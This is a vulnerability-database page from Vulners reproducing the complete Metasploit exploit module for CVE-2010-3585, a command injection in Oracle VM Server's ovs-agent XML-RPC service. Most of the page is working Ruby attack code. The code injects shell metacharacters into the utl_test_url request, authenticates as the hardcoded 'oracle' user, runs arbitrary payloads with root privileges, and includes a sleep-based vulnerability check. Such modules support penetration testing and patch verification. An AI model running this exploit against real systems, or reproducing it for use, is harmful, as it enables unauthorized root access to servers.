Lucene search
K

Oracle VM Server Virtual Server Agent Command Injection

🗓️ 22 Oct 2010 06:16:31Reported by jduck <[email protected]>Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 40 Views

Oracle VM Server Virtual Server Agent Command Injection. Exploits command injection flaw in Oracle's VM Server Virtual Server Agent (ovs-agent) service.Authenticated attacker can execute arbitrary commands as it typically runs with root privileges

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2010-3585
25 Oct 201000:00
circl
CVE
CVE-2010-3585
14 Oct 201017:00
cve
Cvelist
CVE-2010-3585
14 Oct 201017:00
cvelist
Exploit DB
Oracle VM Server Virtual Server Agent - Command Injection (Metasploit)
25 Oct 201000:00
exploitdb
NVD
CVE-2010-3585
14 Oct 201018:00
nvd
Oracle
Oracle Critical Patch Update - October 2010
12 Oct 201000:00
oracle
Oracle
Oracle Critical Patch Update - October 2010
12 Oct 201000:00
oracle
Tenable Nessus
OracleVM 2.2 : ovs-agent (OVMSA-2010-0015)
15 Jul 201300:00
nessus
Packet Storm
Oracle VM Server Virtual Server Agent Command Injection
25 Oct 201000:00
packetstorm
Prion
Design/Logic Flaw
14 Oct 201018:00
prion
Rows per page
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Oracle VM Server Virtual Server Agent Command Injection',
      'Description'    => %q{
          This module exploits a command injection flaw within Oracle\'s VM Server
        Virtual Server Agent (ovs-agent) service.

        By including shell meta characters within the second parameter to the 'utl_test_url'
        XML-RPC methodCall, an attacker can execute arbitrary commands. The service
        typically runs with root privileges.

        NOTE: Valid credentials are required to trigger this vulnerable. The username
        appears to be hardcoded as 'oracle', but the password is set by the administrator
        at installation time.
      },
      'Author'         => [ 'jduck' ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          # ovs-agent.spec:- Fix ovs agent command injection [orabug 10146644] {CVE-2010-3585}
          ['CVE', '2010-3585'],
          ['OSVDB', '68797'],
          ['BID', '44047']
        ],
      'Privileged'     => true,
      'Platform'       => %w{ linux unix },
      'Arch'           => ARCH_CMD,
      'Payload'        =>
        {
          'Space' => 512,
          'BadChars' => '<>',
          'DisableNops' => true,
          'Keys'  => ['cmd', 'cmd_bash'],
        },
      'Targets'        => [ ['Automatic', { }], ],
      'DefaultTarget' => 0,
      'DisclosureDate' => '2010-10-12'
      ))

    register_options(
      [
        Opt::RPORT(8899),
        OptBool.new('SSL', [ true, 'Use SSL', true ]),
        OptString.new('CMD', [ false,  "A single command to execute instead of the payload" ]),
        OptString.new('HttpUsername', [ true,  "The user to authenticate as", 'oracle']),
        OptString.new('HttpPassword', [ true,  "The password to authenticate with" ])
      ])

    deregister_options(
      'HTTP::junk_params', # not your typical POST, so don't inject params.
      'HTTP::junk_slashes' # For some reason junk_slashes doesn't always work, so turn that off for now.
      )
  end

  def go(command)
    xml = <<-EOS
<?xml version="1.0"?>
<methodCall>
<methodName>utl_test_url</methodName>
<params><param>
<value><string>PARAM1</string></value>
</param></params>
<params><param>
<value><string>PARAM2</string></value>
</param></params>
<params><param>
<value><string>PARAM3</string></value>
</param></params>
<params><param>
<value><string>PARAM4</string></value>
</param></params>
</methodCall>
EOS

    sploit = rand_text_alphanumeric(rand(128)+32)
    sploit << "';" + command + ";'"

    xml.gsub!(/PARAM1/, 'http://' + rand_text_alphanumeric(rand(128)+32) + '/')
    xml.gsub!(/PARAM2/, sploit)
    xml.gsub!(/PARAM3/, rand_text_alphanumeric(rand(128)+32))
    xml.gsub!(/PARAM4/, rand_text_alphanumeric(rand(128)+32))

    res = send_request_cgi(
      {
        'uri'          => '/RPC2',
        'method'       => 'POST',
        'ctype'        => 'application/xml',
        'data'         => xml,
      }, 5)

    if not res
      if not session_created?
        print_error('Unable to complete XML-RPC request')
        return nil
      end

      # no response, but session created!!!
      return true
    end

    case res.code
    when 403
      print_error('Authentication failed!')
      return nil

    when 200
      print_good('Our request was accepted!')
      return res

    end

    print_error("Encountered unexpected #{res.code} response:")
    print_error(res.to_s)

    return nil
  end

  def check
    print_status("Attempting to detect if the server is vulnerable...")

    # Try running/timing sleep 3
    start = Time.now
    go('sleep 3')
    elapsed = Time.now - start
    if elapsed >= 3 and elapsed <= 4
      return Exploit::CheckCode::Vulnerable
    end

    return Exploit::CheckCode::Safe
  end

  def exploit
    print_status("Attempting to execute the payload...")

    cmd = datastore['CMD']
    cmd ||= payload.encoded

    if not go(cmd)
      fail_with(Failure::Unknown, "Unable to execute the desired command")
    end

    handler
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

02 Oct 2020 20:00Current
0.9Low risk
Vulners AI Score0.9
CVSS 29
EPSS0.52706
40